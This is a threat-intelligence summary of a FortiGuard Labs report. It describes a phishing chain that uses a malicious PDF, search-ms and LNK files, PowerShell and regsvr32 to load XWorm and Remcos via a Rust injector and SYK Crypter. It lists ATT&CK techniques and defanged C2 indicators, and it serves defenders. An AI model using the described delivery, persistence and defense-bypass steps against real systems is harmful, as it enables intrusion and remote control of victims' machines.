FortiGuard Labs identified a Rust injector chain that loads XWorm and Remcos via SYK Crypter, delivered through a phishing workflow starting with a malicious PDF. The operation leverages the Red Team tool Freeze.rs, Base64/LZMA encoding, and PowerShell to bypass defenses and deploy a dual-RAT capability with C2 hosted on Pastebin.
#FreezeRS #SYKCrypter #XWorm #Remcos #DriveHQ #LNK #PowerShell #Pastebin
#FreezeRS #SYKCrypter #XWorm #Remcos #DriveHQ #LNK #PowerShell #Pastebin
Keypoints
- The attacker uses a Rust injector (doc.dll) linked to the Red Team tool Freeze.rs to bypass EDR controls and load shellcode.
- SYK Crypter is used to deliver Remcos after initial Rust-based injection, with RC4, AES, or LZMA encryption options for evasion.
- A phishing email delivers a malicious PDF that redirects to an HTML file, which uses the search-ms protocol to load a remote LNK file that triggers PowerShell execution.
- The PowerShell chain launches the injector via regsvr32, opens a decoy PDF, and then executes AA.exe, leading to shellcode injection.
- Persistence is achieved by copying the MSIL downloader to Startup and adding a Run registry entry.
- XWorm and Remcos provide post-compromise capabilities, with C2 activity observed and shared via pastebin, indicating broad remote access tools usage.
MITRE Techniques
- [T1566.001] Phishing – The phishing email activity initiated an attack chain using a malicious PDF file. ‘The phishing email activity on July 13 that initiated an attack chain using a malicious PDF file.’
- [T1059.001] PowerShell – The chain executes a PowerShell script to perform further offensive actions. ‘PowerShell script executes Freeze.rs and SYK Crypter for further offensive actions.’
- [T1218.011] Regsvr32 – regsvr32 is used to launch the injector (doc.dll) written in Rust. ‘The PowerShell script pf.ps1… using regsvr32 to launch the injector doc.dll.’
- [T1055] Process Injection – The injector shellcode is injected into a Notepad process via API calls. ‘The injection process begins with creating a “notepad.exe” process… The injector then injects the shellcode.’
- [T1547.001] Startup Items – Persistence is achieved by copying the MSIL downloader to Startup and adding a Run registry entry. ‘For persistence, the malware appends the “.exe” extension to the file “AA” and copies the MSIL downloader to the “Startup” folder. It also adds a registry entry “Run” at “HCKUSOFTWAREMicrosoftWindows NTCurrentVersionWindows.”’
- [T1562.001] Impair Defenses – AMSI and WDLP bypass techniques are applied to enable execution of the dropped payload. ‘The decrypted shellcode applies AMSI bypass and WDLP bypass techniques…’
- [T1071.001] Web Protocols – C2 communication is conducted with a remote server and references to pastebin for C2 configuration. ‘the C2 server IP address remains the same as the XWorm payload’s’ (C2 configuration observed on pastebin)
Indicators of Compromise
- [Hostname] context – freshinxworm[.]ddns[.]net, churchxx[.]ddns[.]net, plunder[.]ddnsguru[.]com, plunder[.]dedyn[.]io, plunder[.]jumpingcrab[.]com, plunder[.]dynnamn[.]ru
- [IP Address] context – 95[.]214[.]27[.]17
- [Files] context – 40c9d3dec84aa057c167005f860749a2cfa55faa0cddd2fe39aaf3906819203c, 5a47b18066d8dcd0fbc524f529002cf0a270d8394de928e8426fa06959a82704, and 2 more hashes
Read more: https://www.fortinet.com/blog/threat-research/malware-distributed-via-freezers-and-syk-crypter